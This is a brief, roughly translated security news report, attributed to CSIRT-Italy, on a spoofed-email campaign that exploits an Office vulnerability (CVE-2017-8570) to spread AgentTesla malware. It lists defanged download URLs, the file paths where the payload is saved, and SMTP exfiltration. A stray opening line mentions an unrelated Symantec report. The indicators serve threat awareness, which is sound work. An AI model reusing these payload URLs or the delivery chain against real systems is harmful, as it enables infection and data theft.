Symantec cybersecurity experts: The malware deployment is preceded by a reconnaissance with the AdFind tool. The victims are large organizations.
Cybercrime, the CVE-2017-8570 vulnerability exploited to spread AgentTesla. CSIRT-Italy cybersecurity experts: The information of interest is then exfiltered via smtp
Cybercrime actors are exploiting Microsoft Office’s CVE-2017-8570 RCE vulnerability in a massive campaign to spread AgentTesla. The CSIRT-Italy cybersecurity experts denounced it. The emails, written in English, seem to have been sent, using spoofing techniques, by import-export companies to multiple recipients hidden by the words “undisclosed-recipients:” Exploiting the flaw, the Office attachment would start, using the PowerShell command, downloading an executable, the malware, from one of the following URLs (depending on the file) hosted in the same domain:
- 1) hXXP: // ck-t-hr [.] Com / mbi.exe;
- 2) hXXP: // ck-t-hr [.] Com / new.exe.
The file will run after being saved in the C: \ Users \ <Username> \ AppData \ Roaming \ mbi.exe or C: \ Users \ <Username> \ AppData \ Roaming \ new.exe folder. In addition, the information deemed of interest is exfiltered via SMTP using the same presumably compromised email box.